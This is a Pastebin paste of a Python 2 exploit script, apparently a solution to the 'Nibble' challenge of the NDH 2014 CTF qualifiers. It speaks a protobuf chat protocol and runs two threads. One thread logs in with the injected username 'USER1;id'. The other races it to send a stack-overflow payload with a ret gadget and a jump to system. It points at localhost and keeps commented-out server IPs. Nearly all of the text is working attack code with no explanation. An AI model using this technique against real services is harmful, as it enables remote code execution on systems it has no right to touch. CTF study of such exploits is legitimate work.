Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- # quals NDH 2014
- # Nibble Sploit
- # pollypocket - y0ug
- import time
- import curses
- import socket
- import chat_protocol_pb2
- from curses.textpad import rectangle
- from struct import pack
- import threading
- import signal
- import sys
- import threading
- import struct
- class NetWrapper:
- def __init__(self):
- pass
- def connect(self):
- try:
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(60);
- #46.231.151.147
- #s.connect(("54.217.202.218", 4567))
- s.connect(("127.0.0.1", 4567))
- self.socket = s
- return True
- except:
- return False
- def auth(self,username):
- authpacket = chat_protocol_pb2.AuthPacket()
- authpacket.username = username
- self.username = username
- data = "1" + authpacket.SerializeToString()
- self.socket.send(pack('<I', len(data)) + data)
- def wait_authresponse(self):
- authresponse = chat_protocol_pb2.TokenResponse()
- authresponse.ParseFromString(self.socket.recv(1024))
- if authresponse.authstatus == 1:
- self.token = authresponse.token
- return True
- else:
- return False
- def sendmessage(self,token, username, msg):
- if len(msg) < 2:
- return
- usermessage = chat_protocol_pb2.ChatMessage()
- usermessage.cookie = token
- usermessage.nickname = username
- usermessage.textmessage = msg
- data = "2" + usermessage.SerializeToString()
- self.socket.send(pack('<I', len(data)) + data)
- event = threading.Event()
- def classic_user():
- n1 = NetWrapper()
- while n1.connect():
- event.set()
- n1.auth("USER1;id")
- event.clear()
- n1.socket.close()
- time.sleep(2)
- def trigger_user():
- n1 = NetWrapper()
- while n1.connect():
- payload = "Z" * 125
- payload += struct.pack('<I', 0x8049d4d) # ret;
- payload += struct.pack('<I', 0x08048BD0) # jmp system
- l = len(payload)
- if l < 0x80:
- header = "\x31\x0a%c" % (chr(l))
- elif l < 0x100:
- header = "\x31\x0a%c\x01" % (chr(l))
- else:
- return
- pwn = struct.pack('<I', len(header+payload))
- pwn += header
- pwn += payload
- event.wait()
- n1.socket.send(pwn)
- n1.socket.close()
- time.sleep(1)
- if __name__ == "__main__":
- thread = threading.Thread(target = classic_user)
- thread2 = threading.Thread(target = trigger_user)
- thread.start()
- thread2.start()
- thread2.join()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement